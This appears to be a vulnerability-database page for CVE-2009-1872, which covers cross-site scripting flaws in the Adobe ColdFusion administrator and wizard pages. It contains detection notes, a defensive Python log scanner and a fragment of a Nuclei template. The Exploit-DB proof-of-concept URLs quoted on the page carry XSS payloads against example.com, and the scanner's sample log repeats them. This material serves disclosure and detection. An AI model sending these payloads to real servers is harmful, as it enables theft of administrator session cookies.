CVE-2009-1872
Published 2009-08-18
Priority: P2 · 72 · medium · CVSS 2.0: 4.3
AV:N/AC:M/Au:N/C:N/I:P/A:N
ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 16.14% (96.5th percentile)
Multiple cross-site scripting (XSS) vulnerabilities in Adobe ColdFusion Server 8.0.1, 8, and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm.
Affected
9 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| adobe | coldfusion | <= 8.0.1 | — |
| adobe | coldfusion | — | — |
| adobe | coldfusion | — | — |
| adobe | coldfusion | — | — |
| adobe | coldfusion | — | — |
| adobe | coldfusion | — | — |
| adobe | coldfusion | — | — |
| adobe | coldfusion | — | — |
| adobe | coldfusion | — | — |
Detection & IOCs
- Detect XSS probes against the searchlog.cfm endpoint by monitoring for script/style injection payloads in the startRow parameter (e.g., STYLE= or javascript: in the value).
- Monitor HTTP requests to /CFIDE/administrator/enter.cfm, /CFIDE/wizards/common/_logintowizard.cfm, and /CFIDE/wizards/common/_authenticatewizarduser.cfm for XSS payloads (e.g., >'">, alert(), script tags) in the query string.
- Alert on requests to ColdFusion CFIDE paths on non-standard port 8500, which is the default ColdFusion standalone server port used in all documented exploit PoCs.
- The attacker's goal is cookie theft; monitor for exfiltration of cookie-based authentication credentials following successful XSS exploitation against ColdFusion administrator paths.
- All four vulnerable endpoints reside under the /CFIDE/ directory tree, which is the ColdFusion administrator/wizard virtual path. Exposure of /CFIDE/ to untrusted networks is the root enabler of this CVE.
- The vulnerability affects ColdFusion 8.0.1 and all earlier versions; patching or restricting access to the /CFIDE/administrator/ and /CFIDE/wizards/ paths is required.
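The first two detection notes, as an added example that is not taken from any of the sources listed on this page: a log scanner that flags requests to the four endpoints when startRow is not numeric or the query string carries markup. The combined-log line format, the finding labels, the function names and the treatment of startRow as a numeric paging offset are assumptions; the sample lines are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Endpoints from the CVE description, lower-cased under the /CFIDE/ virtual path.
STARTROW_ENDPOINT = "/cfide/administrator/logviewer/searchlog.cfm"
QUERY_STRING_ENDPOINTS = {
    "/cfide/wizards/common/_logintowizard.cfm",
    "/cfide/wizards/common/_authenticatewizarduser.cfm",
    "/cfide/administrator/enter.cfm",
}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Markup metacharacters and the keywords named in the detection notes.
SUSPICIOUS = re.compile(r'[<>"\']|style\s*=|javascript:|alert\s*\(', re.I)

def fully_unquote(value, rounds=3):
    """Percent-decode repeatedly so double-encoded probes are still seen."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def classify(log_line):
    """Return a finding label for a probe against the four endpoints, else None."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    target = urlsplit(match.group(1))
    path = unquote(target.path).lower()
    if path == STARTROW_ENDPOINT:
        params = {k.lower(): v for k, v in parse_qs(target.query).items()}
        # Assumption: startRow is a numeric paging offset, so non-digits are abnormal.
        if any(not v.isdigit() for v in params.get("startrow", [])):
            return "startRow-not-numeric"
    elif path in QUERY_STRING_ENDPOINTS and SUSPICIOUS.search(fully_unquote(target.query)):
        return "markup-in-query-string"
    return None

def scan(lines):
    """Return (line_number, finding) for every flagged line."""
    return [(n, f) for n, line in enumerate(lines, 1) if (f := classify(line))]

SAMPLE_LOG = [  # constructed access-log lines using documentation IP ranges
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /CFIDE/administrator/logviewer/searchlog.cfm?viewShort=0&startRow=21 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /CFIDE/administrator/logviewer/searchlog.cfm?viewShort=0&startRow=22%22%20STYLE=%22x HTTP/1.1" 200 5300',
    '198.51.100.7 - - [01/Jan/2024:10:00:06 +0000] "GET /CFIDE/administrator/enter.cfm?%3E%27%22%3Ealert(1) HTTP/1.1" 200 4100',
    '198.51.100.7 - - [01/Jan/2024:10:00:07 +0000] "GET /cfide/wizards/common/_logintowizard.cfm?%253Cb%253E HTTP/1.1" 200 900',
    '192.0.2.10 - - [01/Jan/2024:10:01:00 +0000] "GET /CFIDE/administrator/enter.cfm HTTP/1.1" 200 4000',
]
```

Calling `scan(SAMPLE_LOG)` flags lines 2 to 4 and leaves the two ordinary administrator requests alone; the fourth line is caught only because the query string is decoded more than once.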
CVSS provenance
nvd · v2.0 · 4.3 MEDIUM · AV:N/AC:M/Au:N/C:N/I:P/A:N
vulncheck · 4.3 MEDIUM
GHSA
GHSA-w646-98fx-2v93: Multiple cross-site scripting (XSS) vulnerabilities in Adobe ColdFusion Server 8
ghsa_unreviewed·2022-05-02
CVE-2009-1872 [MEDIUM] CWE-79 GHSA-w646-98fx-2v93: Multiple cross-site scripting (XSS) vulnerabilities in Adobe ColdFusion Server 8
VulnCheck
Adobe ColdFusion Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
vulncheck·2009·CVSS 4.3
Affected: Adobe ColdFusion
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f
No detection rules found.
Exploit-DB
Adobe ColdFusion Server 8.0.1 - 'administrator/logviewer/searchlog.cfm?startRow' Cross-Site Scripting
exploitdb·2009-08-17
---
source: https://www.securityfocus.com/bid/36046/info
Adobe ColdFusion is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would run in the context of the affected application, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
Adobe ColdFusion 8.0.1 and earlier are vulnerable.
http://www.example.com:8500/CFIDE/administrator/logviewer/searchlog.cfm?viewShort=0&sortBy=&filter=CurrentFilter&startRow=22%22%20%20STYLE=%22back
Exploit-DB
Adobe ColdFusion Server 8.0.1 - '/administrator/enter.cfm' Query String Cross-Site Scripting
exploitdb·2009-08-17
---
source: https://www.securityfocus.com/bid/36046/info
http://www.example.com:8500/CFIDE/administrator/enter.cfm?>'">alert('DSECRG_XSS')
Exploit-DB
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_authenticatewizarduser.cfm' Query String Cross-Site Scripting
exploitdb·2009-08-17
---
source: https://www.securityfocus.com/bid/36046/info
http://www.example.com:8500/CFIDE/wizards/common/_authenticatewizarduser.cfm?>'">alert('DSECRG_XSS')
Exploit-DB
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_logintowizard.cfm' Query String Cross-Site Scripting
exploitdb·2009-08-17
---
source: https://www.securityfocus.com/bid/36046/info
http://www.example.com:8500/CFIDE/wizards/common/_logintowizard.cfm?>'">alert('DSECRG_XSS')
Nuclei
Adobe Coldfusion <=8.0.1 - Cross-Site Scripting
nuclei·CVSS 4.3
Adobe Coldfusion alert(document.domain)"
```yaml
- type: word
  part: body
  words:
    - "ColdFusion"
  case-insensitive: true
- type: word
  part: header
  words:
    - text/html
- type: status
  status:
    - 200
# digest: 4a0a0047304502201ff8198f440bc3c26ded9a076bb60410fcf7147d07aef119a6ced17ac9aede4a022100a272b88ce7c3b164494a36f6b53564489b58a31290b2aa8dc58c25c7e3640044:922c64590222798bb761d5b6d8e72950
```
- http://osvdb.org/57182
- http://osvdb.org/57183
- http://osvdb.org/57184
- http://osvdb.org/57185
- http://www.adobe.com/support/security/bulletins/apsb09-12.html
- http://www.dsecrg.com/pages/vul/show.php?id=122
- http://www.securityfocus.com/archive/1/505803/100/0/threaded